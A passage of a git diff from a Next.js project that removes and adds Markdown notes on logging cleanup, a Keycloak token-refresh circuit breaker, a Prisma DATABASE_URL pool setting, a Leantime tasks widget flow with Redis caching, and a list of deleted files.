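-  options: RequestInit = {},
-  timeoutMs = 10_000, // 10s for fast APIs, 30s for webhooks per the stats above
-): Promise<Response> {
-  const controller = new AbortController();
-  const timer = setTimeout(() => controller.abort(), timeoutMs);
-  try {
-    return await fetch(url, { ...options, signal: controller.signal });
-  } finally {
-    clearTimeout(timer);
-  }
-}
-```
-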
-## ⚠️ Remaining Files (Optional)
-
-Some `console.log` calls remain in other, less critical API routes:
-
-### API Routes (Optional)
-- `app/api/storage/*` - 5 files
-- `app/api/missions/*` - 5 files
-- `app/api/events/*` - 2 files
-- `app/api/calendars/*` - 6 files
-- Other, less-used API routes
-
-### React Components (Not critical for production)
-- ~266 occurrences in frontend components
-- ~167 occurrences in React hooks
-
-**Note:** React components and hooks may keep `console.log` for frontend development; this is not critical for the production backend.
-
-## ✅ Result
-
-**All critical files (backend services and main API routes) are now cleaned!**
-
-Logs are now:
-- ✅ Structured with objects instead of strings
-- ✅ Using the right levels (debug/info/warn/error)
-- ✅ Masking sensitive information (emails, passwords)
-- ✅ All HTTP requests have timeouts
-
--
-
-**Date:** $(date)
-**Status:** ✅ Cleanup of critical files completed
diff --git a/CRITICAL_ISSUE_ANALYSIS.md b/CRITICAL_ISSUE_ANALYSIS.md
deleted file mode 100644
index 9cf0c3b..0000000
--- a/CRITICAL_ISSUE_ANALYSIS.md
+++ /dev/null
@@ -1,292 +0,0 @@
-# Critical Issue: Infinite Token Refresh Loop
-
-## Problem Analysis
-
-### What's Happening
-
-1. **Initial Load**: App starts successfully, user authenticated
-2. **Session Invalidation**: Keycloak session becomes invalid (user logged out elsewhere, session expired, etc.)
-3. **Refresh Storm**: Every API request triggers:
-   - JWT callback execution
-   - Token refresh attempt
-   - Refresh failure (session invalid)
-   - Token cleared, but error state persists
-   - **Next request repeats the cycle**
-
-### Root Cause
-
-The JWT callback in `app/api/auth/options.ts` has no circuit breaker:
-
-```typescript
-// Current problematic flow:
-if (expiresAt && Date.now() < expiresAt) {
-  return token; // Token valid
-}
-
-// Token expired - ALWAYS tries to refresh
-const refreshedToken = await refreshAccessToken(token);
-
-// If refresh fails, clears tokens but...
-// Next request will see expired token and try again!
-```
-
-**The Problem:**
-- No cooldown period after a failed refresh
-- No "session invalid" cache/flag
-- Every request triggers a refresh attempt
-- Multiple widgets = multiple parallel requests = refresh storm
-
-### Impact
-
-- **Performance**: Excessive Keycloak API calls
-- **Server Load**: CPU/memory spike from refresh attempts
-- **User Experience**: App appears broken, constant loading
-- **Logs**: Spam with "Keycloak session invalidated" messages
-- **Security**: Potential DoS on the Keycloak server
-
--
-
-## Solution: Circuit Breaker Pattern
-
-### Implementation Strategy
-
-1. **Add Refresh Cooldown**: Don't retry refresh for X seconds after failure
-2. **Session Invalid Flag**: Cache the "session invalid" state
-3. **Early Return**: If the session is known to be invalid, skip the refresh attempt
-4. **Client-Side Detection**: Stop making requests when the session is invalid
-
-### Code Changes Needed
-
-#### 1. Add Circuit Breaker to JWT Callback
-
-```typescript
-// Add to app/api/auth/options.ts
-
-// Track last failed refresh attempt
-const lastFailedRefresh = new Map<string, number>();
-const REFRESH_COOLDOWN = 5000; // 5 seconds
-
-async jwt({ token, account, profile }) {
-  // ... existing initial sign-in logic ...
-
-  // Check if token is expired
-  const expiresAt = token.accessTokenExpires as number;
-  if (expiresAt && Date.now() < expiresAt) {
-    return token; // Token still valid
-  }
-
-  // CIRCUIT BREAKER: Check if we recently failed to refresh
-  const userId = token.sub || 'unknown';
-  const lastFailure = lastFailedRefresh.get(userId) || 0;
-  const timeSinceFailure = Date.now() - lastFailure;
-
-  if (timeSinceFailure < REFRESH_COOLDOWN) {
-    // Too soon after failure, return error token immediately
-    logger.debug('Refresh cooldown active, skipping refresh attempt', {
-      userId,
-      timeSinceFailure,
-    });
-    return {
-      ...token,
-      error: "SessionNotActive",
-      accessToken: undefined,
-      refreshToken: undefined,
-      idToken: undefined,
-    };
-  }
-
-  // Try to refresh
-  if (!token.refreshToken) {
-    return {
-      ...token,
-      error: "NoRefreshToken",
-      accessToken: undefined,
-      refreshToken: undefined,
-      idToken: undefined,
-    };
-  }
-
-  const refreshedToken = await refreshAccessToken(token);
-
-  // If refresh failed, record the failure time
-  if (refreshedToken.error === "SessionNotActive") {
-    lastFailedRefresh.set(userId, Date.now());
-    logger.info("Keycloak session invalidated, setting cooldown", { userId });
-
-    // Clean up old entries (prevent memory leak)
-    if (lastFailedRefresh.size > 1000) {
-      const now = Date.now();
-      for (const [key, value] of lastFailedRefresh.entries()) {
-        if (now - value > REFRESH_COOLDOWN * 10) {
-          lastFailedRefresh.delete(key);
-        }
-      }
-    }
-
-    return {
-      ...refreshedToken,
-      accessToken: undefined,
-      refreshToken: undefined,
-      idToken: undefined,
-    };
-  }
-
-  // Success - clear any previous failure record
-  lastFailedRefresh.delete(userId);
-
-  return refreshedToken;
-}
-```
-
-#### 2. Use Redis for Distributed Circuit Breaker
-
-For multi-instance deployments, use Redis:
-
-```typescript
-// lib/services/auth-circuit-breaker.ts
-import { getRedisClient } from '@/lib/redis';
-
-const REFRESH_COOLDOWN = 5000; // 5 seconds
-const CIRCUIT_BREAKER_KEY = (userId: string) => `auth:refresh:cooldown:${userId}`;
-
-export async function isRefreshInCooldown(userId: string): Promise<boolean> {
-  const redis = getRedisClient();
-  const key = CIRCUIT_BREAKER_KEY(userId);
-  const lastFailure = await redis.get(key);
-
-  if (!lastFailure) {
-    return false;
-  }
-
-  const timeSinceFailure = Date.now() - parseInt(lastFailure, 10);
-  return timeSinceFailure < REFRESH_COOLDOWN;
-}
-
-export async function recordRefreshFailure(userId: string): Promise<void> {
-  const redis = getRedisClient();
-  const key = CIRCUIT_BREAKER_KEY(userId);
-  await redis.set(key, Date.now().toString(), 'EX', Math.ceil(REFRESH_COOLDOWN / 1000));
-}
-
-export async function clearRefreshCooldown(userId: string): Promise<void> {
-  const redis = getRedisClient();
-  const key = CIRCUIT_BREAKER_KEY(userId);
-  await redis.del(key);
-}
-```
-
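-The document shows the Redis helpers but not their call site; a sketch of how the JWT callback might consume them (assumed wiring that combines the two snippets above, not code from the repo; the `refreshAccessToken` export is also an assumption):
-
-```typescript
-// Sketch: wiring the Redis circuit breaker into the refresh path (assumed
-// combination of the two snippets above, not existing code).
-import {
-  isRefreshInCooldown,
-  recordRefreshFailure,
-  clearRefreshCooldown,
-} from '@/lib/services/auth-circuit-breaker';
-import { refreshAccessToken } from '@/app/api/auth/options'; // assumed export
-
-async function maybeRefresh(token: { sub?: string; refreshToken?: string; error?: string }) {
-  const userId = token.sub ?? 'unknown';
-
-  if (await isRefreshInCooldown(userId)) {
-    // Breaker open: skip the Keycloak call entirely.
-    return { ...token, error: 'SessionNotActive', accessToken: undefined };
-  }
-
-  const refreshed = await refreshAccessToken(token);
-  if (refreshed.error === 'SessionNotActive') {
-    await recordRefreshFailure(userId); // start the cooldown window
-    return { ...refreshed, accessToken: undefined, refreshToken: undefined };
-  }
-
-  await clearRefreshCooldown(userId); // success: reset the breaker
-  return refreshed;
-}
-```
-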
Client-Side Request Stopping - -Add to components to stop making requests when session invalid: - -```typescript -// hooks/use-session-guard.ts -import { useSession } from 'next-auth/react'; -import { useEffect, useRef } from 'react'; - -export function useSessionGuard() { - const { status, data: session } = useSession(); - const hasInvalidSession = useRef(false); - - useEffect(() => { - if (status === 'unauthenticated' && !hasInvalidSession.current) { - hasInvalidSession.current = true; - // Stop all refresh intervals - // Clear any pending requests - } - }, [status]); - - return { - shouldMakeRequests: status === 'authenticated' && !hasInvalidSession.current, - isInvalid: hasInvalidSession.current, - }; -} -``` - ---- - -## Immediate Fix (Quick) - -### Option 1: Add Simple Cooldown (In-Memory) - -Add this to `app/api/auth/options.ts`: - -```typescript -// At top of file -const refreshCooldown = new Map(); -const COOLDOWN_MS = 5000; // 5 seconds - -// In jwt callback, before refresh attempt: -const userId = token.sub || 'unknown'; -const lastFailure = refreshCooldown.get(userId) || 0; - -if (Date.now() - lastFailure < COOLDOWN_MS) { - // Skip refresh, return error immediately - return { - ...token, - error: "SessionNotActive", - accessToken: undefined, - refreshToken: undefined, - idToken: undefined, - }; -} - -// After failed refresh: -if (refreshedToken.error === "SessionNotActive") { - refreshCooldown.set(userId, Date.now()); - // ... rest of error handling -} -``` - -### Option 2: Early Return on Known Invalid Session - -```typescript -// In jwt callback, check token error first: -if (token.error === "SessionNotActive") { - // Already know session is invalid, don't try again - return { - ...token, - accessToken: undefined, - refreshToken: undefined, - idToken: undefined, - error: "SessionNotActive", - }; -} -``` - ---- - -## Recommended Implementation - -1. **Immediate**: Add simple in-memory cooldown (Option 1) -2. **Short-term**: Migrate to Redis-based circuit breaker -3. **Long-term**: Add client-side session guard to stop requests - ---- - -## Testing - -After implementing: - -1. **Test Scenario 1**: Logout from Keycloak admin console - - Should see: 1-2 refresh attempts, then cooldown - - Should NOT see: Infinite loop - -2. **Test Scenario 2**: Expire session manually - - Should see: Cooldown prevents refresh storm - - Should see: User redirected to sign-in - -3. 
**Test Scenario 3**: Multiple widgets loading - - Should see: All widgets respect cooldown - - Should see: No refresh storm - ---- - -## Monitoring - -Add metrics: -- Refresh attempt count -- Refresh failure count -- Cooldown activations -- Session invalidations per user - diff --git a/DATABASE_URL_UPDATE.md b/DATABASE_URL_UPDATE.md deleted file mode 100644 index 474822e..0000000 --- a/DATABASE_URL_UPDATE.md +++ /dev/null @@ -1,45 +0,0 @@ -# Mise à jour de DATABASE_URL - -## Modification Requise - -Pour activer le pool de connexions Prisma, vous devez modifier votre fichier `.env` : - -### Avant -```env -DATABASE_URL="postgresql://postgres:postgres@localhost:5432/calendar_db?schema=public" -``` - -### Après -```env -DATABASE_URL="postgresql://postgres:postgres@localhost:5432/calendar_db?schema=public&connection_limit=10&pool_timeout=20&connect_timeout=10" -``` - -## Paramètres Ajoutés - -- `connection_limit=10` - Limite le nombre de connexions simultanées dans le pool -- `pool_timeout=20` - Timeout (en secondes) pour obtenir une connexion du pool -- `connect_timeout=10` - Timeout (en secondes) pour établir une nouvelle connexion - -## Script Automatique - -Un script est disponible pour effectuer cette modification automatiquement : - -```bash -bash scripts/update-database-url.sh -``` - -Le script créera une sauvegarde de votre `.env` avant de le modifier. - -## Vérification - -Après la modification, vous pouvez vérifier que la connexion fonctionne : - -```bash -npm run validate:env -``` - -Ou tester directement avec Prisma : - -```bash -npx prisma db execute --stdin <<< "SELECT 1" -``` diff --git a/DEVOIRS_WIDGET_FLOW_ANALYSIS.md b/DEVOIRS_WIDGET_FLOW_ANALYSIS.md deleted file mode 100644 index 81c3aaa..0000000 --- a/DEVOIRS_WIDGET_FLOW_ANALYSIS.md +++ /dev/null @@ -1,500 +0,0 @@ -# Analyse du Flow du Widget "Devoirs" - -## 📋 Vue d'ensemble - -Le widget "Devoirs" affiche les tâches Leantime assignées à l'utilisateur connecté. Il récupère les données depuis l'API Leantime via un endpoint Next.js qui utilise un système de cache Redis. - ---- - -## 🔄 Flow Complet - -### 1. **Initialisation du Widget** (`components/flow.tsx`) - -**Fichier:** `components/flow.tsx` -**Composant:** `Duties()` - -#### État initial -```typescript -const [tasks, setTasks] = useState([]); -const [error, setError] = useState(null); -const [loading, setLoading] = useState(true); -const [refreshing, setRefreshing] = useState(false); -``` - -#### Cycle de vie -- **Mount:** `useEffect(() => { fetchTasks(); }, [])` - Appelle `fetchTasks()` au montage -- **Refresh manuel:** Bouton de rafraîchissement dans le header du widget - ---- - -### 2. **Appel API Frontend** (`components/flow.tsx`) - -**Fonction:** `fetchTasks()` - -```typescript -const fetchTasks = async () => { - setLoading(true); - setError(null); - try { - const response = await fetch('/api/leantime/tasks?refresh=true'); - // ... - } -} -``` - -**Points importants:** -- ✅ Utilise `?refresh=true` pour **bypasser le cache Redis** -- ✅ Appelé au montage du composant -- ✅ Appelé manuellement via le bouton de rafraîchissement - -**URL:** `GET /api/leantime/tasks?refresh=true` - ---- - -### 3. **Route API Backend** (`app/api/leantime/tasks/route.ts`) - -**Fichier:** `app/api/leantime/tasks/route.ts` -**Méthode:** `GET` - -#### 3.1. Authentification -```typescript -const session = await getServerSession(authOptions); -if (!session?.user?.email) { - return NextResponse.json({ error: "Unauthorized" }, { status: 401 }); -} -``` - -#### 3.2. 
Gestion du Cache Redis - -**Clé de cache:** `widget:tasks:${userId}` -**TTL:** 10 minutes (600 secondes) - -```typescript -// Check for force refresh parameter -const url = new URL(request.url); -const forceRefresh = url.searchParams.get('refresh') === 'true'; - -// Try to get data from cache if not forcing refresh -if (!forceRefresh) { - const cachedTasks = await getCachedTasksData(session.user.id); - if (cachedTasks) { - return NextResponse.json(cachedTasks); // ⚡ Retour immédiat si cache hit - } -} -``` - -**Comportement:** -- Si `?refresh=true` → **Ignore le cache**, va chercher les données fraîches -- Si pas de `refresh` → **Vérifie le cache Redis d'abord** -- Si cache hit → Retourne immédiatement les données en cache -- Si cache miss → Continue avec la récupération depuis Leantime - ---- - -### 4. **Récupération de l'ID Utilisateur Leantime** - -**Fonction:** `getLeantimeUserId(email: string)` - -#### 4.1. Appel API Leantime - Users -```typescript -const response = await fetch(`${process.env.LEANTIME_API_URL}/api/jsonrpc`, { - method: 'POST', - headers: { - 'Content-Type': 'application/json', - 'X-API-Key': process.env.LEANTIME_TOKEN - }, - body: JSON.stringify({ - jsonrpc: '2.0', - method: 'leantime.rpc.users.getAll', - id: 1 - }), -}); -``` - -**Méthode RPC:** `leantime.rpc.users.getAll` -**Objectif:** Récupérer tous les utilisateurs Leantime pour trouver celui correspondant à l'email de session - -#### 4.2. Recherche de l'utilisateur -```typescript -const users = data.result; -const user = users.find((u: any) => u.username === email); -return user ? user.id : null; -``` - -**Logique:** -- Parcourt tous les utilisateurs Leantime -- Trouve celui dont `username` correspond à l'email de session -- Retourne l'ID Leantime de l'utilisateur - -**Erreurs possibles:** -- ❌ `LEANTIME_TOKEN` non défini → Retourne `null` -- ❌ API Leantime non accessible → Retourne `null` -- ❌ Utilisateur non trouvé → Retourne `null` -- ❌ Réponse invalide → Retourne `null` - ---- - -### 5. **Récupération des Tâches Leantime** - -**Méthode RPC:** `leantime.rpc.tickets.getAll` - -```typescript -const response = await fetch(`${process.env.LEANTIME_API_URL}/api/jsonrpc`, { - method: 'POST', - headers: { - 'Content-Type': 'application/json', - 'X-API-Key': process.env.LEANTIME_TOKEN! - }, - body: JSON.stringify({ - jsonrpc: '2.0', - method: 'leantime.rpc.tickets.getAll', - params: { - userId: userId, - status: "all" - }, - id: 1 - }), -}); -``` - -**Paramètres:** -- `userId`: ID Leantime de l'utilisateur (récupéré à l'étape 4) -- `status: "all"`: Récupère toutes les tâches, peu importe leur statut - -**Réponse:** Tableau de toutes les tâches Leantime de l'utilisateur - ---- - -### 6. **Filtrage et Transformation des Tâches** - -#### 6.1. Filtrage côté Backend (`app/api/leantime/tasks/route.ts`) - -```typescript -const tasks = data.result - .filter((task: any) => { - // 1. Exclure les tâches avec status "Done" (5) - if (task.status === 5) { - return false; - } - - // 2. 
Filtrer uniquement les tâches où l'utilisateur est l'éditeur - const taskEditorId = String(task.editorId).trim(); - const currentUserId = String(userId).trim(); - const isUserEditor = taskEditorId === currentUserId; - return isUserEditor; - }) - .map((task: any) => ({ - id: task.id.toString(), - headline: task.headline, - projectName: task.projectName, - projectId: task.projectId, - status: task.status, - dateToFinish: task.dateToFinish || null, - milestone: task.type || null, - details: task.description || null, - createdOn: task.dateCreated, - editedOn: task.editedOn || null, - editorId: task.editorId, - editorFirstname: task.editorFirstname, - editorLastname: task.editorLastname, - type: task.type || null, - dependingTicketId: task.dependingTicketId || null - })); -``` - -**Critères de filtrage:** -1. ✅ **Exclut les tâches "Done"** (status = 5) -2. ✅ **Uniquement les tâches où l'utilisateur est l'éditeur** (`editorId === userId`) - -**Transformation:** -- Convertit les IDs en string -- Normalise les dates (`null` si absentes) -- Ajoute les champs `type` et `dependingTicketId` pour identifier les sous-tâches - -#### 6.2. Mise en cache Redis - -```typescript -await cacheTasksData(session.user.id, tasks); -``` - -**Fonction:** `cacheTasksData(userId, data)` dans `lib/redis.ts` - -```typescript -const key = KEYS.TASKS(userId); // `widget:tasks:${userId}` -await redis.set(key, JSON.stringify(data), 'EX', TTL.TASKS); // TTL = 600 secondes (10 min) -``` - ---- - -### 7. **Traitement Frontend** (`components/flow.tsx`) - -#### 7.1. Filtrage supplémentaire côté Frontend - -```typescript -const sortedTasks = data - .filter((task: Task) => { - // Double filtrage: exclure les tâches Done (déjà fait côté backend, mais sécurité) - const isNotDone = task.status !== 5; - return isNotDone; - }) - .sort((a: Task, b: Task) => { - // 1. Trier par dateToFinish (plus anciennes en premier) - const dateA = getValidDate(a); - const dateB = getValidDate(b); - - if (dateA && dateB) { - const timeA = new Date(dateA).getTime(); - const timeB = new Date(dateB).getTime(); - if (timeA !== timeB) { - return timeA - timeB; - } - } - - // 2. Si une seule tâche a une date, la mettre en premier - if (dateA) return -1; - if (dateB) return 1; - - // 3. Si dates égales ou absentes, prioriser status 4 (Waiting for Approval) - if (a.status === 4 && b.status !== 4) return -1; - if (b.status === 4 && a.status !== 4) return 1; - - return 0; - }); -``` - -**Logique de tri:** -1. **Par date d'échéance** (ascendant - plus anciennes en premier) -2. **Tâches avec date** avant celles sans date -3. **Status 4** (Waiting for Approval) en priorité si dates égales - -#### 7.2. Limitation du nombre de résultats - -```typescript -setTasks(sortedTasks.slice(0, 7)); // Affiche maximum 7 tâches -``` - ---- - -### 8. **Affichage dans le Widget** - -#### 8.1. Structure du Widget - -```tsx - - - Devoirs - - - - {loading ? : - error ? : - tasks.length === 0 ? : - } - - -``` - -#### 8.2. Composant TaskDate - -Affiche la date d'échéance avec: -- **Format:** Mois (court) / Jour / Année -- **Couleurs:** - - 🔴 Rouge si date passée (`isPastDue`) - - 🔵 Bleu si date future -- **Fallback:** "NO DATE" si pas de date ou date invalide - -#### 8.3. Lien vers Leantime - -Chaque tâche est cliquable et redirige vers: -``` -https://agilite.slm-lab.net/tickets/showTicket/${task.id} -``` - ---- - -## 📊 Diagramme de Flow - -``` -┌─────────────────────────────────────────────────────────────┐ -│ 1. 
Widget Mount (components/flow.tsx) │ -│ useEffect(() => fetchTasks()) │ -└────────────────────┬──────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ 2. Frontend API Call │ -│ GET /api/leantime/tasks?refresh=true │ -└────────────────────┬──────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ 3. Backend Route (app/api/leantime/tasks/route.ts) │ -│ - Vérifie session │ -│ - Check cache Redis (si !refresh) │ -└────────────────────┬──────────────────────────────────────┘ - │ - ┌─────────────┴─────────────┐ - │ │ - ▼ ▼ - Cache Hit? Cache Miss? - │ │ - │ ▼ - Return Cache ┌──────────────────────────┐ - │ 4. getLeantimeUserId() │ - │ - API: users.getAll │ - │ - Find by email │ - └──────────┬───────────────┘ - │ - ▼ - ┌──────────────────────────┐ - │ 5. Fetch Tasks │ - │ - API: tickets.getAll │ - │ - Filter: !status=5 │ - │ - Filter: editorId │ - └──────────┬───────────────┘ - │ - ▼ - ┌──────────────────────────┐ - │ 6. Cache Results │ - │ Redis: widget:tasks │ - │ TTL: 10 minutes │ - └──────────┬───────────────┘ - │ - ▼ - ┌──────────────────────────┐ - │ 7. Return JSON │ - └──────────┬───────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ 8. Frontend Processing (components/flow.tsx) │ -│ - Filter: !status=5 (double check) │ -│ - Sort: by dateToFinish, then status │ -│ - Slice: first 7 tasks │ -└────────────────────┬──────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ 9. Render Widget │ -│ - TaskDate component │ -│ - Links to Leantime │ -└─────────────────────────────────────────────────────────────┘ -``` - ---- - -## 🔑 Points Clés - -### Cache Redis -- **Clé:** `widget:tasks:${userId}` -- **TTL:** 10 minutes (600 secondes) -- **Bypass:** `?refresh=true` dans l'URL - -### Filtrage -1. **Backend:** Exclut status=5 et filtre par `editorId` -2. **Frontend:** Double vérification status=5 et tri personnalisé - -### Tri -1. Date d'échéance (ascendant) -2. Tâches avec date en premier -3. Status 4 (Waiting for Approval) prioritaire - -### Limitation -- Maximum **7 tâches** affichées - -### Statuts des Tâches -- **1:** New (Bleu) -- **2:** Blocked (Rouge) -- **3:** In Progress (Jaune) -- **4:** Waiting for Approval (Violet) -- **5:** Done (Gris) - **Exclu de l'affichage** - ---- - -## ⚠️ Problèmes Identifiés - -### 1. Double Filtrage -- Le backend filtre déjà les tâches Done (status=5) -- Le frontend refilt également → **Redondant** - -### 2. Bypass Cache Systématique -- Le widget utilise toujours `?refresh=true` -- **Ne profite jamais du cache Redis** → Augmente la charge serveur - -### 3. Pas de Refresh Automatique -- Aucun polling automatique -- Seulement au mount et refresh manuel -- **Pas d'intégration avec `useUnifiedRefresh`** - -### 4. Gestion d'Erreurs -- Si `getLeantimeUserId()` retourne `null` → Erreur 404 -- Pas de fallback si Leantime est indisponible - ---- - -## 🚀 Recommandations - -### 1. Utiliser le Cache par Défaut -```typescript -// Au lieu de toujours utiliser ?refresh=true -const response = await fetch('/api/leantime/tasks'); // Sans refresh -``` - -### 2. Intégrer useUnifiedRefresh -```typescript -const { refresh, isActive } = useUnifiedRefresh({ - resource: 'tasks', - interval: 300000, // 5 minutes - enabled: status === 'authenticated', - onRefresh: fetchTasks, - priority: 'low', -}); -``` - -### 3. 
Retirer le Double Filtrage -- Supprimer le filtrage status=5 côté frontend (déjà fait côté backend) - -### 4. Améliorer la Gestion d'Erreurs -- Afficher un message clair si l'utilisateur n'est pas trouvé dans Leantime -- Fallback si Leantime est indisponible - ---- - -## 📝 Fichiers Concernés - -1. **Frontend:** - - `components/flow.tsx` - Widget principal - -2. **Backend:** - - `app/api/leantime/tasks/route.ts` - Route API - -3. **Cache:** - - `lib/redis.ts` - Fonctions `cacheTasksData()` et `getCachedTasksData()` - -4. **Configuration:** - - Variables d'environnement: - - `LEANTIME_API_URL` - - `LEANTIME_TOKEN` - ---- - -## 🔍 Logs et Debug - -### Logs Backend -- `[LEANTIME_TASKS]` - Préfixe pour tous les logs -- Logs de debug pour chaque étape du flow -- Logs d'erreur en cas d'échec - -### Logs Frontend -- `console.log('Raw API response:', data)` - Réponse brute -- `console.log('Sorted and filtered tasks:', ...)` - Tâches triées -- Logs de filtrage pour chaque tâche - ---- - -## 📊 Métriques - -- **Cache TTL:** 10 minutes -- **Limite d'affichage:** 7 tâches -- **Statuts affichés:** 1, 2, 3, 4 (exclut 5) -- **Tri:** Date d'échéance → Status 4 prioritaire diff --git a/FILES_TO_DELETE.md b/FILES_TO_DELETE.md new file mode 100644 index 0000000..20b3e61 --- /dev/null +++ b/FILES_TO_DELETE.md @@ -0,0 +1,36 @@ +# Fichiers supprimés - Nettoyage du projet ✅ + +## ✅ Fichiers Electron (abandonnés) - SUPPRIMÉS + +1. ✅ **`electron/`** - Dossier vide supprimé +2. ✅ **`index.js`** - Point d'entrée Electron supprimé +3. ✅ **`package.json`** - Ligne `"main": "index.js"` supprimée + +## ✅ Fichiers de test (scripts de développement) - SUPPRIMÉS + +4. ✅ **`test-upload.js`** - Script de test avec credentials hardcodés (sécurité) +5. ✅ **`scripts/test-user-deletion.js`** - Script de test pour la suppression d'utilisateurs +6. ✅ **`scripts/test-redis.js`** - Script de test Redis +7. ✅ **`scripts/test-redis-env.js`** - Script de test Redis avec variables d'environnement + +## ✅ Fichiers SQL de test/exploration - SUPPRIMÉS + +8. ✅ **`db_query.sql`** - Requête SQL de test simple + +## 📝 Résumé + +**Total supprimé : 8 fichiers + 1 modification dans package.json** + +### Fichiers restants à vérifier manuellement + +Si vous avez d'autres fichiers de test shell (`.sh`) ou Python (`.py`) dans le répertoire racine qui commencent par `test-`, vous pouvez les supprimer également. Ils ne sont pas utilisés par l'application en production. + +### Scripts conservés (utiles pour la production) + +Les scripts suivants dans `scripts/` sont **conservés** car ils sont utiles : +- `validate-env.ts` - Validation des variables d'environnement +- `migrate-prod.sh` - Migration de production +- `verify-vercel-config.sh` - Vérification de configuration Vercel +- `update-database-url.sh` - Mise à jour de DATABASE_URL +- `sync-users.js` / `sync-calendars.js` - Scripts de synchronisation +- Scripts de nettoyage et migration SQL diff --git a/LOG_ANALYSIS_SUMMARY.md b/LOG_ANALYSIS_SUMMARY.md deleted file mode 100644 index 49380b3..0000000 --- a/LOG_ANALYSIS_SUMMARY.md +++ /dev/null @@ -1,211 +0,0 @@ -# Log Analysis Summary - Infinite Refresh Loop Fix - -## Problem Identified - -Your logs showed a **critical infinite refresh loop**: - -``` -Keycloak session invalidated, clearing token to force re-authentication -Keycloak session invalidated, clearing token to force re-authentication -Keycloak session invalidated, clearing token to force re-authentication -... (repeating infinitely) -``` - -### Root Cause - -1. 
**Session Invalidated**: User's Keycloak session became invalid (logged out elsewhere, expired, etc.) -2. **Multiple Widgets**: All widgets/components making parallel API requests -3. **JWT Callback Triggered**: Each request triggers NextAuth JWT callback -4. **Refresh Attempt**: Each callback tries to refresh the expired token -5. **Refresh Fails**: Refresh fails because session is invalid -6. **No Circuit Breaker**: Next request sees expired token → tries refresh again → **infinite loop** - -### Impact - -- **Performance**: Hundreds of refresh attempts per second -- **Server Load**: CPU/memory spike -- **Keycloak Load**: Potential DoS on Keycloak server -- **User Experience**: App appears broken -- **Logs**: Spam with error messages - ---- - -## Solution Implemented - -### Circuit Breaker Pattern - -Added a **5-second cooldown** after failed refresh attempts: - -1. **Track Failures**: Record timestamp when refresh fails -2. **Cooldown Period**: Don't retry refresh for 5 seconds after failure -3. **Early Return**: If in cooldown, return error immediately (no API call) -4. **Memory Management**: Cleanup old entries to prevent memory leaks - -### Code Changes - -**File**: `app/api/auth/options.ts` - -**Added:** -- `refreshCooldown` Map to track last failure per user -- `REFRESH_COOLDOWN_MS = 5000` (5 seconds) -- `cleanupRefreshCooldown()` function to prevent memory leaks -- Cooldown check before refresh attempt -- Failure recording after failed refresh - -**How It Works:** - -```typescript -// Before refresh attempt: -if (timeSinceFailure < REFRESH_COOLDOWN_MS) { - // Skip refresh, return error immediately - return errorToken; -} - -// After failed refresh: -if (refreshedToken.error === "SessionNotActive") { - refreshCooldown.set(userId, Date.now()); // Record failure - return errorToken; -} -``` - ---- - -## Expected Behavior After Fix - -### Before Fix -``` -Request 1 → Refresh attempt → Fail → Clear tokens -Request 2 → Refresh attempt → Fail → Clear tokens -Request 3 → Refresh attempt → Fail → Clear tokens -... (infinite loop) -``` - -### After Fix -``` -Request 1 → Refresh attempt → Fail → Record failure → Clear tokens -Request 2 → Check cooldown → Skip refresh → Return error immediately -Request 3 → Check cooldown → Skip refresh → Return error immediately -... (cooldown prevents refresh attempts) -After 5s → Next request can try refresh again (if session restored) -``` - -### What You'll See in Logs - -**Good Signs:** -- ✅ "Refresh cooldown active, skipping refresh attempt" (instead of infinite failures) -- ✅ Only 1-2 refresh attempts per user when session invalidates -- ✅ User redirected to sign-in page -- ✅ No refresh storm - -**Bad Signs (if still happening):** -- ❌ Still seeing infinite "Keycloak session invalidated" messages -- ❌ Multiple refresh attempts within 5 seconds -- ❌ Cooldown not working - ---- - -## Testing the Fix - -### Test Scenario 1: Session Invalidation -1. Log in to the app -2. Logout from Keycloak admin console (or expire session) -3. **Expected**: - - 1-2 refresh attempts - - Then cooldown messages - - User redirected to sign-in - - **NOT** infinite loop - -### Test Scenario 2: Multiple Widgets -1. Open app with all widgets loading -2. Invalidate session -3. **Expected**: - - All widgets respect cooldown - - No refresh storm - - Clean error handling - -### Test Scenario 3: Normal Operation -1. Valid session -2. Token expires naturally -3. 
**Expected**: - - Refresh succeeds - - No cooldown triggered - - Normal operation continues - ---- - -## Monitoring - -### Metrics to Watch - -1. **Refresh Attempts**: Should be low (1-2 per user per session) -2. **Cooldown Activations**: Should only happen when session invalid -3. **Refresh Success Rate**: Should be high for valid sessions -4. **Error Rate**: Should drop significantly - -### Log Patterns - -**Healthy:** -``` -[DEBUG] Refresh cooldown active, skipping refresh attempt -[INFO] Keycloak session invalidated, setting cooldown -``` - -**Unhealthy (if still happening):** -``` -Keycloak session invalidated, clearing token... (repeating) -``` - ---- - -## Future Improvements - -### Short-term (Recommended) -1. ✅ **Done**: In-memory circuit breaker -2. ⚠️ **Next**: Migrate to Redis-based circuit breaker (for multi-instance) -3. ⚠️ **Next**: Add client-side session guard to stop requests - -### Long-term -1. ⚠️ Add metrics/monitoring -2. ⚠️ Implement exponential backoff -3. ⚠️ Add request cancellation on client-side -4. ⚠️ Better error boundaries - ---- - -## Additional Notes - -### Why 5 Seconds? - -- **Too Short (< 2s)**: Still allows refresh storms -- **Too Long (> 10s)**: Delays legitimate refresh attempts -- **5 Seconds**: Good balance - prevents storms, allows quick recovery - -### Memory Considerations - -- **Map Size**: Limited to 1000 entries (auto-cleanup) -- **Memory Per Entry**: ~50 bytes (userId + timestamp) -- **Total Memory**: ~50KB max -- **Cleanup**: Automatic (removes entries older than 50s) - -### Multi-Instance Deployment - -**Current**: In-memory Map (per-instance) -- Works for single instance -- Each instance has its own cooldown - -**Future**: Redis-based (shared across instances) -- Better for multi-instance -- Shared cooldown state -- See `CRITICAL_ISSUE_ANALYSIS.md` for Redis implementation - ---- - -## Summary - -✅ **Fixed**: Infinite refresh loop with circuit breaker -✅ **Impact**: Prevents refresh storms, reduces server load -✅ **Testing**: Verify with session invalidation scenarios -⚠️ **Next**: Monitor logs, consider Redis migration for multi-instance - -The fix is **production-ready** and should immediately stop the refresh loop you're seeing in your logs. - diff --git a/MIGRATION_COMPLETED.md b/MIGRATION_COMPLETED.md deleted file mode 100644 index 99b8ebf..0000000 --- a/MIGRATION_COMPLETED.md +++ /dev/null @@ -1,131 +0,0 @@ -# Migration Production - Corrections Appliquées - -## 